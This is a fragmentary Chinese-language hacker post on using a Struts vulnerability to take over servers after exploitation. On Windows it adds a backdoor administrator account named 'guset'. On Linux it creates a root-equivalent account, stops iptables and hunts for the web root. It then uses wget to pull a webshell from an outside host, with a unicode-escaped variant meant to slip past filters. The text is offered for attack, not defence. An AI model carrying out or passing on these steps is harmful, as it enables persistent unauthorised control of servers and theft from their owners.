关于struts漏洞的利用工具.docVIP

关于struts漏洞的利用工具net stop policyagent 再连接，表示可以连接了 然后就是一般的加用户啊什么的，常规的，不再描述 net user guset ifuckyou!@# /add net localgroup administrators guset /add 这个擦PP啊，自己去网上找教程，不是这里的重点 再谈谈linux的利用 Linux我是完全的不熟悉，然后问起还被liuker大牛一顿那啥，这里表示感谢了。 我不懂java，所以只能谈谈利用，目测又遇见一个。 目测有两个方向可以走，一个是加用户，因为是root，先看看开ssh没有chkconfig --list 然后查看下是不是内网 是外网，我们来增加一个用户 useradd -u 0??-o??-g root??-G root -d /home/cat11 cat11 -p $1$F1B0hFxb$NkzreGE7srRJswTgLYq9c 执行后发现已经加上去了..我们来ssh连接下,发现连接不上去，我们关闭防火墙 /etc/rc.d/init.d/iptables stop 再登录 OK，成功了 还有就是我们要getshell的话，既然是linux的，一般都使用的是apache的，我们直接读配置文件就好了，对于默认的就是cat /etc/httpd/conf/httpd.conf 如果不是的我们使用find命令来查找 find / -name httpd.conf 然后继续cat /xx/xx/ 但是要是我们不会读配置咋办呢？换个思路..一样的使用find命令 网站为了搜索引擎的方便，一般都会存在robots.txt这个文件的，我们直接搜这个文件就好了find / -name robots.txt 然后配合刚才的apache的配置文件对比就知道是那个了，准备下载文件，可是基友告诉我 这个比较郁闷的说 wget\u0020http\u003a\u002f\u002fwww.0day5.tk\u002fhei\u002fshopex.html 可是我继续使用 wget http://www.0day5.tk/hei/shopex.html也是可以下载的 然后就是MV过去，然后就没有然后了